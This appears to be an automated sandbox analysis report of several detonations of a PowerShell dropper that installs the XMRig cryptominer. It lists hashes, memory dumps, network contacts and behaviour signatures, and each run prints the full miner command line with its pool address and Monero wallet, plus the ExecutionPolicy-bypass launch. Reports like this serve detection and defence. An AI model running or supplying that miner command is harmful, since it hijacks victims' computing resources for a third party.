memory/4540-14-0x000001AEB81D0000-0x000001AEB81E2000-memory.dmp

memory/4540-15-0x000001AEB81C0000-0x000001AEB81CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/960-46-0x000001FB40660000-0x000001FB40680000-memory.dmp

memory/960-47-0x000001FB406A0000-0x000001FB406C0000-memory.dmp

memory/960-48-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/4540-49-0x00007FF8AF043000-0x00007FF8AF045000-memory.dmp

memory/4540-50-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

memory/4540-51-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

memory/960-53-0x000001FB406E0000-0x000001FB40700000-memory.dmp

memory/960-52-0x000001FB406C0000-0x000001FB406E0000-memory.dmp

memory/960-54-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-55-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-56-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-58-0x000001FB406E0000-0x000001FB40700000-memory.dmp

memory/960-57-0x000001FB406C0000-0x000001FB406E0000-memory.dmp

memory/960-59-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-60-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-61-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-62-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-63-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-64-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-65-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-66-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-67-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-68-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-69-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-70-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-71-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-72-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-73-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-74-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-75-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-76-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-77-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-78-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-79-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-80-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-81-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-82-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-83-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-84-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-85-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-86-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-87-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-88-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-89-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-90-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-91-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-92-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-93-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-94-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-95-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-96-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-97-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-98-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-99-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-100-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-101-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-102-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-103-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-104-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-105-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-106-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-107-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-108-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-109-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-110-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-111-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-112-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-113-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-114-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-115-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-116-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-117-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:48

Platform

win11-20240419-en

Max time kernel

1789s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3580-0-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nnw23gqd.yyc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3580-9-0x0000026EC3090000-0x0000026EC30B2000-memory.dmp

memory/3580-10-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-11-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-12-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-14-0x0000026EC3110000-0x0000026EC3122000-memory.dmp

memory/3580-15-0x0000026EC3100000-0x0000026EC310A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3900-46-0x00000264C5C80000-0x00000264C5CA0000-memory.dmp

memory/3900-47-0x00000264C7480000-0x00000264C74A0000-memory.dmp

memory/3900-48-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3580-51-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp

memory/3900-50-0x00000264C74A0000-0x00000264C74C0000-memory.dmp

memory/3580-49-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3900-52-0x00000264C74C0000-0x00000264C74E0000-memory.dmp

memory/3900-53-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-54-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-56-0x00000264C74A0000-0x00000264C74C0000-memory.dmp

memory/3900-55-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-57-0x00000264C74C0000-0x00000264C74E0000-memory.dmp

memory/3900-58-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-59-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-60-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-61-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-62-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-63-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-64-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-65-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-66-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-67-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-68-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-69-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-70-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-71-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-72-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-73-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-74-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-75-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-76-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-77-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-78-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-79-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-80-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-81-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-82-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-83-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-84-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-85-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-86-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-87-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-88-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-89-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-90-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-91-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-92-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-93-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-94-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-95-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-96-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-97-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-98-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-99-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-100-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-101-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-102-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-103-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-104-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-105-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-106-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-107-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-108-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-109-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-110-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-111-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-112-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-113-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-114-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-115-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

memory/3900-116-0x00007FF7763E0000-0x00007FF777013000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 98.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

memory/1280-0-0x00007FF8D81B3000-0x00007FF8D81B5000-memory.dmp

memory/1280-1-0x000001AEF24B0000-0x000001AEF24D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mgwnjfvk.ps5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1280-11-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/1280-12-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/1280-14-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/1280-15-0x000001AEF2860000-0x000001AEF2872000-memory.dmp

memory/1280-16-0x000001AEF2840000-0x000001AEF284A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3156-47-0x000001E958E40000-0x000001E958E60000-memory.dmp

memory/3156-48-0x000001E95A750000-0x000001E95A770000-memory.dmp

memory/3156-49-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-51-0x000001E95A770000-0x000001E95A790000-memory.dmp

memory/3156-50-0x000001E95A790000-0x000001E95A7B0000-memory.dmp

memory/1280-53-0x00007FF8D81B3000-0x00007FF8D81B5000-memory.dmp

memory/3156-52-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/1280-54-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/3156-55-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/1280-56-0x00007FF8D81B0000-0x00007FF8D8C71000-memory.dmp

memory/3156-57-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-58-0x000001E95A790000-0x000001E95A7B0000-memory.dmp

memory/3156-59-0x000001E95A770000-0x000001E95A790000-memory.dmp

memory/3156-60-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-61-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-62-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-63-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-64-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-65-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-66-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-67-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-68-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-69-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-70-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-71-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-72-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-73-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-74-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-75-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-76-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-77-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-78-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-79-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-80-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-81-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-82-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-83-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-84-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-85-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-86-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-87-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-88-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-89-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-90-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-91-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-92-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-93-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-94-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-95-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-96-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-97-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-98-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-99-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-100-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-101-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-102-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-103-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-104-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-105-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-106-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-107-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-108-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-109-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-110-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-111-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-112-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-113-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-114-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-115-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-116-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-117-0x00007FF795950000-0x00007FF796583000-memory.dmp

memory/3156-118-0x00007FF795950000-0x00007FF796583000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/4776-4-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/4776-5-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/4776-6-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/4776-7-0x0000024021010000-0x0000024021032000-memory.dmp

memory/4776-10-0x0000024039650000-0x00000240396C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l0mzekqv.lj5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4776-25-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/4776-61-0x00000240395E0000-0x00000240395EA000-memory.dmp

memory/4776-48-0x00000240395F0000-0x0000024039602000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/224-90-0x00000211D6B30000-0x00000211D6B50000-memory.dmp

memory/224-91-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/4776-93-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/224-92-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

